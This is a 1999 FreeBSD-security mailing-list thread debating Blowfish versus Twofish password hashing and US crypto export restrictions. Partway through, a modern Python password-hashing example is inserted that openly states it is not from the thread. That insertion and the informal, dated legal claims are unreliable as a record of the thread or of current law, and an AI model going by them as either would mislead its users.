Received: from mars.capital-data.com (mars.capital-data.com [156.46.8.135]) by hub.freebsd.org (Postfix) with ESMTP id 474A814F63 for ; Fri, 30 Apr 1999 21:44:27 -0700 (PDT) (envelope-from brian@capital-data.com)
Received: by mars.capital-data.com (Postfix, from userid 1000) id 556D71D101; Fri, 30 Apr 1999 18:45:23 -0500 (CDT)
Subject: Blowfish/Twofish
To: freebsd-security@freebsd.org
Date: Fri, 30 Apr 1999 18:45:23 -0500 (CDT)
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 90
Message-Id: <19990430234523.556D71D101@mars.capital-data.com>
From: brian@capital-data.com (Brian Beaulieu)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Are there plans to implement the blowfish or twofish cipher into FreeBSD?
Thanks,

Brian

From owner-freebsd-security  Fri Apr 30 23: 6:42 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.unacom.com (phoenix.unacom.com [206.113.48.50]) by hub.freebsd.org (Postfix) with SMTP id 3F3CD14FD7 for ; Fri, 30 Apr 1999 23:06:35 -0700 (PDT) (envelope-from geniusj@phoenix.unacom.com)
Received: (qmail 69282 invoked by uid 1000); 1 May 1999 06:06:33 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 May 1999 06:06:33 -0000
Date: Sat, 1 May 1999 02:06:33 -0400 (EDT)
From: The Tech-Admin Dude
To: Brian Beaulieu
Cc: freebsd-security@freebsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To: <19990430234523.556D71D101@mars.capital-data.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This is something i've wanted to know for a long time :).. It should adopt
the passwd.conf settings from OpenBSD with selection of encryption, ratio,
etc.. OpenBSD has a very good feature with that and it would be great if
FreeBSD adopted it! :-)

-Jason DiCioccio

On Fri, 30 Apr 1999, Brian Beaulieu wrote:

> Are there plans to implement the blowfish or twofish cipher into FreeBSD?
>
> Thanks,
>
> Brian
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security  Fri Apr 30 23:13:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id B4E1715148 for ; Fri, 30 Apr 1999 23:13:23 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id IAA17155; Sat, 1 May 1999 08:13:18 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id IAA21636; Sat, 1 May 1999 08:13:16 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: The Tech-Admin Dude
Cc: Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Sat, 01 May 1999 02:06:33 EDT."
Date: Sat, 01 May 1999 08:13:15 +0200
Message-ID: <21634.925539195@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message , The Tech-Admin Dude writes:

>This is something i've wanted to know for a long time :).. It should adopt
>the passwd.conf settings from OpenBSD with selection of encryption, ratio,
>etc.. OpenBSD has a very good feature with that and it would be great if
>FreeBSD adopted it! :-)

Make patches
send-pr

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
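Jason's suggestion a few messages up, that FreeBSD adopt OpenBSD's passwd.conf and let the administrator choose the password cipher and its rounds, comes down to two mechanisms: each stored hash records which algorithm and work factor produced it, and the hashing side reads a single policy. What follows is an added example of both, not code from this thread, from FreeBSD or from OpenBSD. Blowfish and Twofish are not in Python's standard library, so PBKDF2-HMAC-SHA256 and scrypt stand in for them; the `$scheme$cost$salt$digest` layout, the `SCHEMES` registry, the `POLICY` keys and every function name below are this example's own assumptions.

```python
"""Administrator-selectable password hashing with self-describing hashes.

Added example for this thread; it is not FreeBSD, OpenBSD or anyone's
posted code. It models the passwd.conf idea (pick the cipher and the
work factor in one place) with Python's standard library only. Blowfish
and Twofish are not in the stdlib, so two KDFs stand in for them:
PBKDF2-HMAC-SHA256 and scrypt. The "$scheme$cost$salt$digest" format,
the POLICY keys and every name below are this example's own assumptions.
"""
import base64
import hashlib
import hmac
import os

# Registry of available schemes: name -> function(password, salt, cost) -> digest.
# Adding an algorithm means adding one entry here; nothing already stored changes.
SCHEMES = {
    "pbkdf2": lambda pw, salt, cost: hashlib.pbkdf2_hmac(
        "sha256", pw, salt, 2 ** cost, dklen=32),
    "scrypt": lambda pw, salt, cost: hashlib.scrypt(
        pw, salt=salt, n=2 ** cost, r=8, p=1, dklen=32),
}

# Site policy, in the spirit of OpenBSD's "localcipher = blowfish,<rounds>".
# Constructed for this example; cost is log2 of the iteration count (or N).
POLICY = {"scheme": "scrypt", "cost": 14}


def _b64(raw):
    return base64.b64encode(raw).decode("ascii").rstrip("=")


def _unb64(text):
    return base64.b64decode(text + "=" * (-len(text) % 4))


def hash_password(password, policy=POLICY, salt=None):
    """Hash under the current policy; the result names its own scheme and cost."""
    if policy["scheme"] not in SCHEMES:
        raise ValueError("policy names an unknown scheme: %r" % policy["scheme"])
    salt = os.urandom(16) if salt is None else salt
    digest = SCHEMES[policy["scheme"]](password.encode("utf-8"), salt, policy["cost"])
    return "$%s$%d$%s$%s" % (policy["scheme"], policy["cost"], _b64(salt), _b64(digest))


def parse(stored):
    """Split "$scheme$cost$salt$digest" into its parts (salt and digest as bytes)."""
    _, scheme, cost, salt, digest = stored.split("$")
    return scheme, int(cost), _unb64(salt), _unb64(digest)


def verify(password, stored):
    """Recompute with the scheme and cost recorded in the stored string itself."""
    scheme, cost, salt, digest = parse(stored)
    if scheme not in SCHEMES:
        return False            # algorithm retired or never installed: fail closed
    candidate = SCHEMES[scheme](password.encode("utf-8"), salt, cost)
    return hmac.compare_digest(candidate, digest)


def needs_rehash(stored, policy=POLICY):
    """True if the stored hash predates current policy (other scheme or lower cost)."""
    scheme, cost, _, _ = parse(stored)
    return scheme != policy["scheme"] or cost < policy["cost"]


def login(password, stored, policy=POLICY):
    """Check the password; on success, return the hash to store from now on.

    The plaintext is only in hand at login time, so that is the one moment an
    old hash can be replaced by one made under the current policy.
    """
    if not verify(password, stored):
        return False, stored
    if needs_rehash(stored, policy):
        return True, hash_password(password, policy)
    return True, stored


if __name__ == "__main__":
    legacy = hash_password("correct horse", {"scheme": "pbkdf2", "cost": 12})
    ok, current = login("correct horse", legacy)
    print(legacy)
    print(ok, current)          # True, a fresh "$scrypt$14$..." string
```

Switching the site to a new algorithm is a one-line change to `POLICY`; existing entries keep verifying under the scheme written into them and are replaced one by one as users log in, while a scheme removed from `SCHEMES` makes its old hashes fail closed rather than verify silently.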
From owner-freebsd-security  Fri Apr 30 23:32: 5 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 89B1C14F9E for ; Fri, 30 Apr 1999 23:32:03 -0700 (PDT) (envelope-from danderse@cs.utah.edu)
Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id AAA27853; Sat, 1 May 1999 00:31:50 -0600 (MDT)
From: David G Andersen
Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id AAA21013; Sat, 1 May 1999 00:31:48 -0600 (MDT)
Message-Id: <199905010631.AAA21013@lal.cs.utah.edu>
Subject: Re: Blowfish/Twofish
To: freebsd-security@freebsd.org
Date: Sat, 1 May 1999 00:31:48 -0600 (MDT)
Cc: geniusj@phoenix.unacom.com, brian@capital-data.com
In-Reply-To: <21634.925539195@critter.freebsd.dk> from "Poul-Henning Kamp" at May 1, 99 08:13:15 am
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Lo and behold, Poul-Henning Kamp once said:
>
> >This is something i've wanted to know for a long time :).. It should adopt
> >the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> >etc.. OpenBSD has a very good feature with that and it would be great if
> >FreeBSD adopted it! :-)
>
> Make patches
> send-pr

Note that OpenBSD passwd file work was actually implemented by a person
outside of the US, and it would likely be advantageous if the FreeBSD
situation were to be handled similarly.  Parts of the design were done
domestically, but the code was kept out, which simplifies distribution
somewhat.
-Dave

--
work: danderse@cs.utah.edu                me:  angio@pobox.com
University of Utah                        http://www.angio.net/
Computer Science - Flux Research Group    "What's footnote FIVE?"

From owner-freebsd-security  Sat May  1  6:35:59 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id E831414CBA for ; Sat, 1 May 1999 06:35:54 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA09651; Sat, 1 May 1999 23:05:49 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA23756; Sat, 1 May 1999 23:06:23 +0930
Date: Sat, 1 May 1999 23:06:18 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Poul-Henning Kamp
Cc: The Tech-Admin Dude , Brian Beaulieu , freebsd-security@freebsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To: <21634.925539195@critter.freebsd.dk>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 1 May 1999, Poul-Henning Kamp wrote:

> In message , The Tech-Admin Dude writes:
>
> >This is something i've wanted to know for a long time :).. It should adopt
> >the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> >etc.. OpenBSD has a very good feature with that and it would be great if
> >FreeBSD adopted it! :-)
>
> Make patches
> send-pr

This is a project I've had lurking in my head for a while now - I want to
test 3.1-stable for the week and a bit leading up to the code freeze (and
test various backports prior to committing) but after that I might look at
doing this.
Kris

>
> --
> Poul-Henning Kamp             FreeBSD coreteam member
> phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> FreeBSD -- It will take a long time before progress goes too far!
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

-----
The Feynman problem-solving algorithm:
1. Write down the problem
2. Think real hard
3. Write down the solution

From owner-freebsd-security  Sat May  1 12:11:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5874A15ADF for ; Sat, 1 May 1999 12:11:06 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id PAA03308; Sat, 1 May 1999 15:07:31 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Sat, 1 May 1999 15:07:30 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Poul-Henning Kamp
Cc: The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-Reply-To: <21634.925539195@critter.freebsd.dk>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

So I'd gladly write this code, as well as do a number of other
crypto-related things, but I'm inside the US.  Someone outside the US will
have to take this initiative, I'm afraid.

I'd recommend against using Blowfish--go for Twofish.

On Sat, 1 May 1999, Poul-Henning Kamp wrote:

> In message , The Tech-Admin Dude writes:
>
> >This is something i've wanted to know for a long time :).. It should adopt
> >the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> >etc..
OpenBSD has a very good feature with that and it would be great if
> >FreeBSD adopted it! :-)
>
> Make patches
> send-pr
>
> --
> Poul-Henning Kamp             FreeBSD coreteam member
> phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> FreeBSD -- It will take a long time before progress goes too far!
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security  Sat May  1 12:45:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from bonjour.cc.columbia.edu (bonjour.cc.columbia.edu [128.59.59.133]) by hub.freebsd.org (Postfix) with ESMTP id F183514BF9 for ; Sat, 1 May 1999 12:45:42 -0700 (PDT) (envelope-from stuyman@confusion.net)
Received: from confusion.net (dialup-11-15.cc.columbia.edu [128.59.36.251]) by bonjour.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id PAA18314; Sat, 1 May 1999 15:32:08 -0400 (EDT)
Message-ID: <372B5684.30237E81@confusion.net>
Date: Sat, 01 May 1999 15:31:16 -0400
From: Laurence Berland
Organization: B.R.A.T.T.
X-Mailer: Mozilla 4.5 [en] (Win95; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Robert Watson
Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Really?
As I understand the export bans, it's ok to export it on paper, then scan
it in somewhere else, so you can mail it to someone outside the US, they
scan it, and the source tree is synced.  Maybe I'm wrong.  Speaking of
which, is there any good OCR (or scanning in general) software for
FreeBSD, I'm thinking of getting a scanner.

Robert Watson wrote:

> So I'd gladly write this code, as well as do a number of other
> crypto-related things, but I'm inside the US.  Someone outside the US will
> have to take this initiative, I'm afraid.
>
> I'd recommend against using Blowfish--go for Twofish.
>
> On Sat, 1 May 1999, Poul-Henning Kamp wrote:
>
> > In message , The Tech-Admin Dude writes:
> >
> > >This is something i've wanted to know for a long time :).. It should adopt
> > >the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> > >etc.. OpenBSD has a very good feature with that and it would be great if
> > >FreeBSD adopted it! :-)
> >
> > Make patches
> > send-pr
> >
> > --
> > Poul-Henning Kamp             FreeBSD coreteam member
> > phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> > FreeBSD -- It will take a long time before progress goes too far!
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
>
>   Robert N Watson
>

--
Laurence Berland, Stuyvesant HS Debate
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
Windows 98: n.
   useless extension to a minor patch release for 32-bit extensions and
   a graphical shell for a 16-bit patch to an 8-bit operating system
   originally coded for a 4-bit microprocessor, written by a 2-bit
   company that can't stand for 1 bit of competition.
http://stuy.debate.net
icq #7434346
aol imer E1101

From owner-freebsd-security  Sat May  1 16:14:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from etosha (modem09.tdnet.com.br [200.236.148.202]) by hub.freebsd.org (Postfix) with SMTP id 678F914C36 for ; Sat, 1 May 1999 16:13:54 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: (qmail 952 invoked from network); 1 May 1999 23:14:19 -0000
Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 1 May 1999 23:14:19 -0000
Message-ID: <372B8ACA.764E20FD@tdnet.com.br>
Date: Sat, 01 May 1999 20:14:18 -0300
From: Gustavo V G C Rios
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
MIME-Version: 1.0
To: security@freebsd.org
Subject: security advisories
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

The page http://www.freebsd.org/security/ has some advisories, but how can
i work with them? How to read the *.asc files? Which softwares should i
use to read them ?

Thanks a lot!

From owner-freebsd-security  Sat May  1 20:33:39 1999
Delivered-To: freebsd-security@freebsd.org
Received: from smtp1.andrew.cmu.edu (SMTP1.ANDREW.CMU.EDU [128.2.10.81]) by hub.freebsd.org (Postfix) with ESMTP id A9CEF14E88 for ; Sat, 1 May 1999 20:33:26 -0700 (PDT) (envelope-from Harry_M_Leitzell@cmu.edu)
Received: from unix13.andrew.cmu.edu (UNIX13.ANDREW.CMU.EDU [128.2.15.17]) by smtp1.andrew.cmu.edu (8.8.5/8.8.2) with SMTP id XAA26461; Sat, 1 May 1999 23:13:15 -0400 (EDT)
Date: Sat, 1 May 1999 23:13:16 -0400 (EDT)
From: "Harry M.
Leitzell"
X-Sender: Harry_M_Leitzell@unix13.andrew.cmu.edu
To: Robert Watson
Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I am unaware of the restriction laws placed upon the US in terms of
encryption.  Could someone clarify them for me?

1) If Robert were to write code on a machine that is in a foreign
country, would it have been considered exported?  (Xterm on a cs.hut.fi
machine for example to code in)  Even if he is in the US while doing so?

2) Can we still do the moving by paper to another country and scanning it
in?  Is that legitimate or been deemed illegal?

3) If I write a disk encryptor that sits on the MBR and transfer the disk
out of country, is that a no-no?

Thanks

On Sat, 1 May 1999, Robert Watson wrote:

>
> So I'd gladly write this code, as well as do a number of other
> crypto-related things, but I'm inside the US.  Someone outside the US will
> have to take this initiative, I'm afraid.
>
> I'd recommend against using Blowfish--go for Twofish.
>
> On Sat, 1 May 1999, Poul-Henning Kamp wrote:
>
> > In message , The Tech-Admin Dude writes:
> >
> > >This is something i've wanted to know for a long time :).. It should adopt
> > >the passwd.conf settings from OpenBSD with selection of encryption, ratio,
> > >etc.. OpenBSD has a very good feature with that and it would be great if
> > >FreeBSD adopted it! :-)
> >
> > Make patches
> > send-pr
> >
> > --
> > Poul-Henning Kamp             FreeBSD coreteam member
> > phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
> > FreeBSD -- It will take a long time before progress goes too far!
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
>
>
>   Robert N Watson
>
> robert@fledge.watson.org              http://www.watson.org/~robert/
> PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
>
> Carnegie Mellon University            http://www.cmu.edu/
> TIS Labs at Network Associates, Inc.  http://www.tis.com/
> Safeport Network Services             http://www.safeport.com/
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]
Harry M. Leitzell - Harry_M_Leitzell@cmu.edu
Carnegie Mellon University
Finger for PGP Public Key
[-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-]

From owner-freebsd-security  Sat May  1 21:27:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 9A5E214D6D for ; Sat, 1 May 1999 21:27:12 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id NAA12350; Sun, 2 May 1999 13:57:10 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA29203; Sun, 2 May 1999 13:57:45 +0930
Date: Sun, 2 May 1999 13:57:45 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: "Harry M. Leitzell"
Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@freebsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 1 May 1999, Harry M.
Leitzell wrote:

> I am unaware of the restriction laws placed upon the US in terms of
> encryption.  Could someone clarify them for me?

As I understand it, it's illegal to export products containing
cryptography stronger than certain prescribed key lengths outside the US
without a permit. There are exceptions, such as financial institutions and
subsidiaries of US companies, and recently "e-Commerce" client/server
applications also (e.g. SSL-enabled commerce services, but not
general-purpose web browsers), but for general-purpose applications you're
limited to something like 40-bit and (limited) 56-bit encryption keys.
There's been a lot of pressure on the US government to ease these
restrictions (which they claim are targeted against "terrorists" using
encryption to mask their activities) but progress has been slow in getting
them to open up the regulations.

> 1) If Robert were to write code on a machine that is in a foreign
> country, would it have been considered exported?  (Xterm on a cs.hut.fi
> machine for example to code in)  Even if he is in the US while doing so?

Yes. Also if a foreigner were to download restricted crypto code from say
an FTP server in the US then the owner of the site could conceivably be
put up for treason charges :-)

This is why FreeBSD (and other projects) either maintain their
cryptography code outside the US (the OpenBSD project is housed in
Canada), or have two separate repositories (domestic and international).
I'd guess that synching "supporting" code changes unrelated to the actual
encryption process between the two repositories is legal providing none of
the actual cryptography-making code leaves the US.

> 2) Can we still do the moving by paper to another country and scanning it
> in?  Is that legitimate or been deemed illegal?

That's still a loophole, ISTR - it's how the PGP 5.0 sources were exported
to Finland and published there.
Hmm..I recall half-hearing a story recently about a guy who found himself
being classified as a munition after trying to "export" the restricted
cryptography code which was written or tattooed onto his arm. Was I
dreaming? :)

> 3) If I write a disk encryptor that sits on the MBR and transfer the disk
> out of country, is that a no-no?

I'd say so.

If these issues are relevant to you then I recommend you look into the
exact regs further..they're fairly involved.

Kris

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been
rolled up into a point, sprinkled with lemon juice and jabbed into
someone's eye"
"Wow, That's sharp!"
- Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security  Sun May  2  2:25:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id B2B9614D9D for ; Sun, 2 May 1999 02:25:32 -0700 (PDT) (envelope-from jeroen@vangelderen.org)
Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:525 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20162>; Sun, 2 May 1999 11:25:11 +0200
Message-ID: <372C19F5.625BB2B@vangelderen.org>
Date: Sun, 02 May 1999 11:25:09 +0200
From: "Jeroen C. van Gelderen"
X-Mailer: Mozilla 4.51 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Robert Watson
Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Robert Watson wrote:
[...]
> I'd recommend against using Blowfish--go for Twofish.

Regardless of what you think about Blowfish, recommending Twofish
is a very, very bad move.
The golden rule in crypto is that trust
comes with the age of an algorithm. Twofish is waaaay too young to
be trusted, especially since it's an evolutionary improvement
over Blowfish which you don't like for some reason.

In any case, if you recommend against using Blowfish, what's the
reason?

Cheers,
Jeroen
--
Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE

From owner-freebsd-security  Sun May  2  2:30:49 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6515814F95 for ; Sun, 2 May 1999 02:30:46 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id LAA21806; Sun, 2 May 1999 11:30:45 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id LAA02572; Sun, 2 May 1999 11:30:44 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: "Jeroen C. van Gelderen"
Cc: Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Sun, 02 May 1999 11:25:09 +0200." <372C19F5.625BB2B@vangelderen.org>
Date: Sun, 02 May 1999 11:30:44 +0200
Message-ID: <2570.925637444@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <372C19F5.625BB2B@vangelderen.org>, "Jeroen C. van Gelderen" writes:
>Robert Watson wrote:
>[...]
>> I'd recommend against using Blowfish--go for Twofish.
>
>Regardless of what you think about Blowfish, recommending Twofish
>is a very, very bad move.

Considering that the concept for passwords is a "kleenex-model",
it doesn't matter.
We can change the algorithm at the first hint
of trouble and ask people to change passwords and we're in safe
water.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security  Sun May  2  2:36:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 2CFBF1511D for ; Sun, 2 May 1999 02:36:08 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA23336; Sun, 2 May 1999 02:32:55 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: "Jeroen C. van Gelderen"
Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Sun, 02 May 1999 11:25:09 +0200." <372C19F5.625BB2B@vangelderen.org>
Date: Sun, 02 May 1999 02:32:55 -0700
Message-ID: <23332.925637575@zippy.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Regardless of what you think about Blowfish, recommending Twofish
> is a very, very bad move. The golden rule in crypto is that trust
> comes with the age of an algorithm. Twofish is waaaay to young to
> be trusted, especially since it's an evolutionary improvement
> over Blowfish which you don't like for some reason.

Erm, one of the goals of PAM is to support *multiple* encryption
methods, so why not do a PAM module for each and let the administrator
decide which authentication methods to support in /etc/pam.conf?
- Jordan

From owner-freebsd-security  Sun May  2  2:36:48 1999
Delivered-To: freebsd-security@freebsd.org
Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id 47B82159F8 for ; Sun, 2 May 1999 02:36:42 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
Received: from zippy.cdrom.com (localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id CAA23358; Sun, 2 May 1999 02:33:28 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com)
To: Poul-Henning Kamp
Cc: "Jeroen C. van Gelderen" , Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Sun, 02 May 1999 11:30:44 +0200." <2570.925637444@critter.freebsd.dk>
Date: Sun, 02 May 1999 02:33:27 -0700
Message-ID: <23355.925637607@zippy.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Considering that the concept for passwords is a "kleenex-model",

OK, I'll bite, what the hell is a "kleenex-model" ? :-)

- Jordan

From owner-freebsd-security  Sun May  2  2:37:52 1999
Delivered-To: freebsd-security@freebsd.org
